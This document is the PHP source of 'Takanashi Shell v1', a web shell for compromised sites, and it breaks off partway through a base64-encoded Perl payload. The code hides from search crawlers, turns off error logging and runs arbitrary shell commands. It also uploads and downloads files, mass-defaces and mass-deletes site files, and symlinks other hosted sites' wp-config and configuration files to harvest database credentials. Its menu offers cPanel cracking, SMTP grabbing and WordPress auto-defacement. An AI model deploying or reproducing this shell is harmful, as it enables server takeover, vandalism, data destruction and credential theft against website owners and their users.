Takanashi Shell

1. <?php
2. session_start();
3. error_reporting(0);
4. set_time_limit(0);
5. @set_magic_quotes_runtime(0);
6. @clearstatcache();
7. @ini_set('error_log',NULL);
8. @ini_set('log_errors',0);
9. @ini_set('max_execution_time',0);
10. @ini_set('output_buffering',0);
11. @ini_set('display_errors', 0);
12.  
13. $auth_pass = "04e090de606dcc1fd84bc92686ab5edf"; // default: gandatamvan
14. $color = "#003fff";
15. $default_action = 'FilesMan';
16. $default_use_ajax = true;
17. $default_charset = 'UTF-8';
18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
19. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
20. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
21. header('HTTP/1.0 404 Not Found');
22. exit;
23. }
24. }
25.  
26. function login_shell() {
27. ?>
28. <html>
29. <head>
30. <title>Takanashi Shell v1</title>
31. <style type="text/css">
32. html {
33. margin: 20px auto;
34. background: url(https://wallpapers.wallhaven.cc/wallpapers/full/wallhaven-7821.jpg) no-repeat center center fixed ; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover;
35. color: red;
36. text-align: center;
37. }
38. header {
39. color: red;
40. margin: 10px auto;
41. }
42. input[type=password] {
43. width: 250px;
44. height: 25px;
45. color: red;
46. background: url(https://wallpapers.wallhaven.cc/wallpapers/full/wallhaven-7821.jpg) no-repeat center center fixed ; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover;
47. border: 1px dotted black;
48. padding: 5px;
49. margin-left: 20px;
50. text-align: center;
51. }
52. </style>
53. </head>
54. <center>
55. <header>
56. <pre>
57. <form method="post">
58. <input type="password" name="pass">
59. </form>
60. _______ _ _ _ _____ _ _ _
61. |__ __| | | | | (_) / ____| | | | |
62. | | __ _| | ____ _ _ __ __ _ ___| |__ _ | (___ | |__ ___| | |
63. | |/ _` | |/ / _` | '_ \ / _` / __| '_ \| | \___ \| '_ \ / _ \ | |
64. | | (_| | < (_| | | | | (_| \__ \ | | | | ____) | | | | __/ | |
65. |_|\__,_|_|\_\__,_|_| |_|\__,_|___/_| |_|_| |_____/|_| |_|\___|_|_|
66.  
67. <center><img src='https://img00.deviantart.net/be12/i/2013/299/e/8/rikka_takanashi_by_ladyracheya-d6rv1f3.png' height="500" /></center>
68. </pre>
69. </header>
70. <?php
71. exit;
72. }
73. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
74. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
75. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
76. else
77. login_shell();
78. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
79. @ob_clean();
80. $file = $_GET['file'];
81. header('Content-Description: File Transfer');
82. header('Content-Type: application/octet-stream');
83. header('Content-Disposition: attachment; filename="'.basename($file).'"');
84. header('Expires: 0');
85. header('Cache-Control: must-revalidate');
86. header('Pragma: public');
87. header('Content-Length: ' . filesize($file));
88. readfile($file);
89. exit;
90. }
91. ?>
92. <html>
93. <head>
94. <title>Takanashi Shell v1</title>
95. <meta name='author' content='GopressXploits'>
96. <meta charset="UTF-8">
97. <style type='text/css'>
98. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
99. html {
100. background: url(https://wallpapers.wallhaven.cc/wallpapers/full/wallhaven-7821.jpg) no-repeat center center fixed ; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover;
101. color: #aa00ff;
102. font-family: 'Ubuntu';
103. font-size: 13px;
104. width: 100%;
105. }
106. li {
107. display: inline;
108. margin: 5px;
109. padding: 5px;
110. }
111. table, th, td {
112. border-collapse:collapse;
113. font-family: Tahoma, Geneva, sans-serif;
114. background: transparent;
115. font-family: 'Ubuntu';
116. font-size: 13px;
117. }
118. .table_home, .th_home, .td_home {
119. border: 1px solid #aa00ff;
120. }
121. th {
122. padding: 10px;
123. }
124. a {
125. color: #aa00ff;
126. text-decoration: none;
127. }
128. a:hover {
129. color: Yellow;
130. text-decoration: underline;
131. }
132. b {
133. color: gold;
134. }
135. input[type=text], input[type=password],input[type=submit] {
136. background: transparent;
137. color: #aa00ff;
138. border: 1px solid #aa00ff;
139. margin: 5px auto;
140. padding-left: 5px;
141. font-family: 'Ubuntu';
142. font-size: 13px;
143. }
144. textarea {
145. border: 1px solid #aa00ff;
146. width: 100%;
147. height: 400px;
148. padding-left: 5px;
149. margin: 10px auto;
150. resize: none;
151. background: transparent;
152. color: #aa00ff;
153. font-family: 'Ubuntu';
154. font-size: 13px;
155. }
156. select {
157. width: 152px;
158. background: #aa00ff;
159. color: lime;
160. border: 1px solid #aa00ff;
161. margin: 5px auto;
162. padding-left: 5px;
163. font-family: 'Ubuntu';
164. font-size: 13px;
165. }
166. option:hover {
167. background: #aa00ff;
168. color: #aa00ff;
169. }
170. </style>
171. </head>
172. <!-- head info start here -->
173. <div class="head_info">
174. <Center><pre>
175. <img src="https://i.imgur.com/dRjATgW.png" height="0" /><br>
176. </pre>
177. </Center>
178. <table ><tr>
179. <td style="padding: 5px;"><?php echo $buff; ?></td>
180. </tr></table>
181. </div>
182. <!-- head info end here -->
183. <?php
184. ###############################################################################
185. // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
186. // ReCoded by : RESIS-07
187. // Greetz: All Member IndoXploit. & GopressXploits & All my friend
188. ###############################################################################
189. function w($dir,$perm) {
190. if(!is_writable($dir)) {
191. return "<font color=red>".$perm."</font>";
192. } else {
193. return "<font color=#05c101>".$perm."</font>";
194. }
195. }
196. function r($dir,$perm) {
197. if(!is_readable($dir)) {
198. return "<font color=red>".$perm."</font>";
199. } else {
200. return "<font color=#05c101>".$perm."</font>";
201. }
202. }
203. function exe($cmd) {
204. if(function_exists('system')) {
205. @ob_start();
206. @system($cmd);
207. $buff = @ob_get_contents();
208. @ob_end_clean();
209. return $buff;
210. } elseif(function_exists('exec')) {
211. @exec($cmd,$results);
212. $buff = "";
213. foreach($results as $result) {
214. $buff .= $result;
215. } return $buff;
216. } elseif(function_exists('passthru')) {
217. @ob_start();
218. @passthru($cmd);
219. $buff = @ob_get_contents();
220. @ob_end_clean();
221. return $buff;
222. } elseif(function_exists('shell_exec')) {
223. $buff = @shell_exec($cmd);
224. return $buff;
225. }
226. }
227. function perms($file){
228. $perms = fileperms($file);
229. if (($perms & 0xC000) == 0xC000) {
230. // Socket
231. $info = 's';
232. } elseif (($perms & 0xA000) == 0xA000) {
233. // Symbolic Link
234. $info = 'l';
235. } elseif (($perms & 0x8000) == 0x8000) {
236. // Regular
237. $info = '-';
238. } elseif (($perms & 0x6000) == 0x6000) {
239. // Block special
240. $info = 'b';
241. } elseif (($perms & 0x4000) == 0x4000) {
242. // Directory
243. $info = 'd';
244. } elseif (($perms & 0x2000) == 0x2000) {
245. // Character special
246. $info = 'c';
247. } elseif (($perms & 0x1000) == 0x1000) {
248. // FIFO pipe
249. $info = 'p';
250. } else {
251. // Unknown
252. $info = 'u';
253. }
254. // Owner
255. $info .= (($perms & 0x0100) ? 'r' : '-');
256. $info .= (($perms & 0x0080) ? 'w' : '-');
257. $info .= (($perms & 0x0040) ?
258. (($perms & 0x0800) ? 's' : 'x' ) :
259. (($perms & 0x0800) ? 'S' : '-'));
260. // Group
261. $info .= (($perms & 0x0020) ? 'r' : '-');
262. $info .= (($perms & 0x0010) ? 'w' : '-');
263. $info .= (($perms & 0x0008) ?
264. (($perms & 0x0400) ? 's' : 'x' ) :
265. (($perms & 0x0400) ? 'S' : '-'));
266. // World
267. $info .= (($perms & 0x0004) ? 'r' : '-');
268. $info .= (($perms & 0x0002) ? 'w' : '-');
269. $info .= (($perms & 0x0001) ?
270. (($perms & 0x0200) ? 't' : 'x' ) :
271. (($perms & 0x0200) ? 'T' : '-'));
272. return $info;
273. }
274. function hdd($s) {
275. if($s >= 1073741824)
276. return sprintf('%1.2f',$s / 1073741824 ).' GB';
277. elseif($s >= 1048576)
278. return sprintf('%1.2f',$s / 1048576 ) .' MB';
279. elseif($s >= 1024)
280. return sprintf('%1.2f',$s / 1024 ) .' KB';
281. else
282. return $s .' B';
283. }
284. function ambilKata($param, $kata1, $kata2){
285. if(strpos($param, $kata1) === FALSE) return FALSE;
286. if(strpos($param, $kata2) === FALSE) return FALSE;
287. $start = strpos($param, $kata1) + strlen($kata1);
288. $end = strpos($param, $kata2, $start);
289. $return = substr($param, $start, $end - $start);
290. return $return;
291. }
292. function getsource($url) {
293. $curl = curl_init($url);
294. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
295. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
296. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
297. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
298. $content = curl_exec($curl);
299. curl_close($curl);
300. return $content;
301. }
302. function bing($dork) {
303. $npage = 1;
304. $npages = 30000;
305. $allLinks = array();
306. $lll = array();
307. while($npage <= $npages) {
308. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
309. if($x) {
310. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
311. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
312. $npage = $npage + 10;
313. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
314. } else break;
315. }
316. $URLs = array();
317. foreach($allLinks as $url){
318. $exp = explode("/", $url);
319. $URLs[] = $exp[2];
320. }
321. $array = array_filter($URLs);
322. $array = array_unique($array);
323. $sss = count(array_unique($array));
324. foreach($array as $domain) {
325. echo $domain."\n";
326. }
327. }
328. function reverse($url) {
329. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
330. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
331. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
332. curl_setopt($ch, CURLOPT_HEADER, 0);
333. curl_setopt($ch, CURLOPT_POST, 1);
334. $resp = curl_exec($ch);
335. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
336. $array = explode(",,", $resp);
337. unset($array[0]);
338. foreach($array as $lnk) {
339. $lnk = "http://$lnk";
340. $lnk = str_replace(",", "", $lnk);
341. echo $lnk."\n";
342. ob_flush();
343. flush();
344. }
345. curl_close($ch);
346. }
347. if(get_magic_quotes_gpc()) {
348. function idx_ss($array) {
349. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
350. }
351. $_POST = idx_ss($_POST);
352. $_COOKIE = idx_ss($_COOKIE);
353. }
354.  
355. if(isset($_GET['dir'])) {
356. $dir = $_GET['dir'];
357. chdir($dir);
358. } else {
359. $dir = getcwd();
360. }
361. $kernel = php_uname();
362. $ip = gethostbyname($_SERVER['HTTP_HOST']);
363. $dir = str_replace("\\","/",$dir);
364. $scdir = explode("/", $dir);
365. $freespace = hdd(disk_free_space("/"));
366. $total = hdd(disk_total_space("/"));
367. $used = $total - $freespace;
368. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=Yellow>OFF</font>";
369. $ds = @ini_get("disable_functions");
370. $mysql = (function_exists('mysql_connect')) ? "<font color=Yellow>ON</font>" : "<font color=red>OFF</font>";
371. $curl = (function_exists('curl_version')) ? "<font color=Yellow>ON</font>" : "<font color=red>OFF</font>";
372. $wget = (exe('wget --help')) ? "<font color=Yellow>ON</font>" : "<font color=red>OFF</font>";
373. $perl = (exe('perl --help')) ? "<font color=Yellow>ON</font>" : "<font color=red>OFF</font>";
374. $python = (exe('python --help')) ? "<font color=Yellow>ON</font>" : "<font color=red>OFF</font>";
375. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=Yellow>NONE</font>";
376. if(!function_exists('posix_getegid')) {
377. $user = @get_current_user();
378. $uid = @getmyuid();
379. $gid = @getmygid();
380. $group = "?";
381. } else {
382. $uid = @posix_getpwuid(posix_geteuid());
383. $gid = @posix_getgrgid(posix_getegid());
384. $user = $uid['name'];
385. $uid = $uid['uid'];
386. $group = $gid['name'];
387. $gid = $gid['gid'];
388. }
389. echo "<center>";
390. echo "System: <font color=Yellow>".$kernel."</font><br>";
391. echo "User: <font color=Yellow>".$user."</font> (".$uid.") Group: <font color=Yellow>".$group."</font> (".$gid.")<br>";
392. echo "Server IP: <font color=Yellow>".$ip."</font> | Your IP: <font color=Yellow>".$_SERVER['REMOTE_ADDR']."</font><br>";
393. echo "HDD: <font color=Yellow>$used</font> / <font color=Yellow>$total</font> ( Free: <font color=Yellow>$freespace</font> )<br>";
394. echo "Safe Mode: $sm<br>";
395. echo "Disable Functions: $show_ds<br>";
396. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
397. echo "Permission:&nbsp;&nbsp;<font color='Green'>[<font color='white'> ".w($dir, perms($dir))." <font color='Yellow'>]<br>";
398.  
399. echo "Current DIR: ";
400. foreach($scdir as $c_dir => $cdir) {
401. echo "<a href='?dir=";
402. for($i = 0; $i <= $c_dir; $i++) {
403. echo $scdir[$i];
404. if($i != $c_dir) {
405. echo "/";
406. }
407. }
408. echo "'>$cdir</a>/";
409. }
410. echo "</center>";
411. echo "<hr>";
412. echo "<center>";
413. echo "<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'><font face='iceland'size='10' color='Yellow'>Takanashi </font><font face='iceland' size='10' color=#680699;>Shell<font face='iceland'size='10' color='Yellow'> V.1</font>";
414. echo "<ul><font face='iceland' size='4'>";
415. echo "<ul>";
416. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?'>Home</a> ]</li>";
417. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=upload'>Upload</a> <font color='Yellow'>]</li>";
418. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cmd'>Command</a> <font color='Yellow'>]</li>";
419. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_deface'>Mass Deface</a> <font color='Yellow'>]</li><br><br>";
420. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=mass_delete'>Mass Delete</a> <font color='Yellow'>]</li>";
421. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=config'>Config</a> <font color='Yellow'>]</li>";
422. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=jumping'>Jumping</a> <font color='Yellow'>]</li>";
423. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=zoneh'>Mass Zone-h</a> <font color='Yellow'>]</li>";
424. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> <font color='Yellow'>]</li><br><br>";
425. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=adfin'>Admin Finder</a> <font color='Yellow'>]</li>";
426. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=shellscan'>Shell Finder</a> <font color='Yellow'>]</li>";
427. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=adminer'>Adminer</a> <font color='Yellow'>]</li>";
428. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpanel'>cPanel Crack</a> <font color='Yellow'>]</li>";
429. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> <font color='Yellow'>]</li>";
430. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> <font color='Yellow'>]</li><br><br>";
431. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> <font color='Yellow'>]</li>";
432. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cgi'>CGI Telnet</a> <font color='Yellow'>]</li>";
433. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=network'>network</a> <font color='Yellow'>]</li>";
434. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=fake_root'>Fake Root</a> <font color='Yellow'>]</li>";
435. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=smtp'>SMTP Grabber</a> <font color='Yellow'>]</li><br><br>";
436. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> <font color='Yellow'>]</li>";
437. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> <font color='Yellow'>]</li><br><br>";
438. echo "<li><font color='Yellow'>[ <a style='border:2px solid #ff0000;width:80px;padding:0px 8px 0px 8px;' href='?logout=true'><font color='red'>Logout</a> <font color='Yellow'>]</li>";
439. echo "</ul>";
440. echo "</center>";
441. echo "<hr>";
442. if($_GET['logout'] == true) {
443. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
444. echo "<script>window.location='?';</script>";
445. } elseif($_GET['do'] == 'upload') {
446. echo "<center>";
447. if($_POST['upload']) {
448. if($_POST['tipe_upload'] == 'biasa') {
449. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
450. $act = "<font color=Yellow>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
451. } else {
452. $act = "<font color=red>failed to upload file</font>";
453. }
454. } else {
455. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
456. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
457. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
458. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
459. $act = "<font color=Yellow>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
460. } else {
461. $act = "<font color=red>failed to upload file</font>";
462. }
463. } else {
464. $act = "<font color=red>failed to upload file</font>";
465. }
466. }
467. }
468. echo "Upload File:
469. <form method='post' enctype='multipart/form-data'>
470. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
471. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
472. <input type='file' name='ix_file'>
473. <input type='submit' value='upload' name='upload'>
474. </form>";
475. echo $act;
476. echo "</center>";
477. } elseif($_GET['do'] == 'cmd') {
478. echo "<form method='post'>
479. <font style='text-decoration: underline;'>".$user."@".$ip.": ~ $ </font>
480. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
481. </form>";
482. if($_POST['do_cmd']) {
483. echo "<pre>".exe($_POST['cmd'])."</pre>";
484. }
485. } elseif($_GET['do'] == 'mass_deface') {
486. function sabun_massal($dir,$namafile,$isi_script) {
487. if(is_writable($dir)) {
488. $dira = scandir($dir);
489. foreach($dira as $dirb) {
490. $dirc = "$dir/$dirb";
491. $lokasi = $dirc.'/'.$namafile;
492. if($dirb === '.') {
493. file_put_contents($lokasi, $isi_script);
494. } elseif($dirb === '..') {
495. file_put_contents($lokasi, $isi_script);
496. } else {
497. if(is_dir($dirc)) {
498. if(is_writable($dirc)) {
499. echo "<font color=Yellow>http://</font>$lokasi<br>";
500. file_put_contents($lokasi, $isi_script);
501. $idx = sabun_massal($dirc,$namafile,$isi_script);
502. }
503. }
504. }
505. }
506. }
507. }
508. function sabun_biasa($dir,$namafile,$isi_script) {
509. if(is_writable($dir)) {
510. $dira = scandir($dir);
511. foreach($dira as $dirb) {
512. $dirc = "$dir/$dirb";
513. $lokasi = $dirc.'/'.$namafile;
514. if($dirb === '.') {
515. file_put_contents($lokasi, $isi_script);
516. } elseif($dirb === '..') {
517. file_put_contents($lokasi, $isi_script);
518. } else {
519. if(is_dir($dirc)) {
520. if(is_writable($dirc)) {
521. echo "<font color=Yellow>http://</font>$dirb/$namafile<br>";
522. file_put_contents($lokasi, $isi_script);
523. }
524. }
525. }
526. }
527. }
528. }
529. if($_POST['start']) {
530. if($_POST['tipe_sabun'] == 'mahal') {
531. echo "<div style='margin: 5px auto; padding: 5px'>";
532. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
533. echo "</div>";
534. } elseif($_POST['tipe_sabun'] == 'murah') {
535. echo "<div style='margin: 5px auto; padding: 5px'>";
536. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
537. echo "</div>";
538. }
539. } else {
540. echo "<center>";
541. echo "<form method='post'>
542. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
543. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
544. <font style='text-decoration: underline;'>Folder:</font><br>
545. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
546. <font style='text-decoration: underline;'>Filename:</font><br>
547. <input type='text' name='d_file' value='index.htm' style='width: 450px;' height='10'><br>
548. <font style='text-decoration: underline;'>Index File:</font><br>
549. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by RESIS-07</textarea><br>
550. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
551. </form></center>";
552. }
553. } elseif($_GET['do'] == 'mass_delete') {
554. function hapus_massal($dir,$namafile) {
555. if(is_writable($dir)) {
556. $dira = scandir($dir);
557. foreach($dira as $dirb) {
558. $dirc = "$dir/$dirb";
559. $lokasi = $dirc.'/'.$namafile;
560. if($dirb === '.') {
561. if(file_exists("$dir/$namafile")) {
562. unlink("$dir/$namafile");
563. }
564. } elseif($dirb === '..') {
565. if(file_exists("".dirname($dir)."/$namafile")) {
566. unlink("".dirname($dir)."/$namafile");
567. }
568. } else {
569. if(is_dir($dirc)) {
570. if(is_writable($dirc)) {
571. if(file_exists($lokasi)) {
572. echo "[<font color=Yellow>DELETED</font>] $lokasi<br>";
573. unlink($lokasi);
574. $idx = hapus_massal($dirc,$namafile);
575. }
576. }
577. }
578. }
579. }
580. }
581. }
582. if($_POST['start']) {
583. echo "<div style='margin: 5px auto; padding: 5px'>";
584. hapus_massal($_POST['d_dir'], $_POST['d_file']);
585. echo "</div>";
586. } else {
587. echo "<center>";
588. echo "<form method='post'>
589. <font style='text-decoration: underline;'>Folder:</font><br>
590. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
591. <font style='text-decoration: underline;'>Filename:</font><br>
592. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
593. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
594. </form></center>";
595. }
596. } elseif($_GET['do'] == 'config') {
597. $idx = mkdir("takanashi_config", 0777);
598. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
599. $htc = fopen("takanashi_config/.htaccess","w");
600. fwrite($htc, $isi_htc);
601. fclose($htc);
602. if(preg_match("/vhosts|vhost/", $dir)) {
603. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
604. $vhost = "IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpvcGVuZGlyKG15ICRkaXIgLCAiL3Zhci93d3cvdmhvc3RzLyIpOw0KZm9yZWFjaChzb3J0IHJlYWRkaXIgJGRpcikgew0KICAgIG15ICRpc0RpciA9IDA7DQogICAgJGlzRGlyID0gMSBpZiAtZCAkXzsNCiRzaXRlc3MgPSAkXzsNCg0KDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3MvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3Atb3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb20vaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2UudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvb3Njb21tZXJjZXMvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLW9zY29tbWVyY2VzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXNob3BwaW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NhbGUvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXNhbGUudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYW1lbWJlci9jb25maWcuaW5jLnBocCcsJHNpdGVzcy4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnLmluYy5waHAnLCRzaXRlc3MuJy1hbWVtYmVyMi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXJzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictbWVtYmVycy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlczEudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FkbWluL2NvbmYucGhwJywkc2l0ZXNzLictNS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictNC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC1jb25maWcucGhwJywkc2l0ZXNzLictV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dwL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy1Xb3JkcHJlc3MudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV1Avd3AtY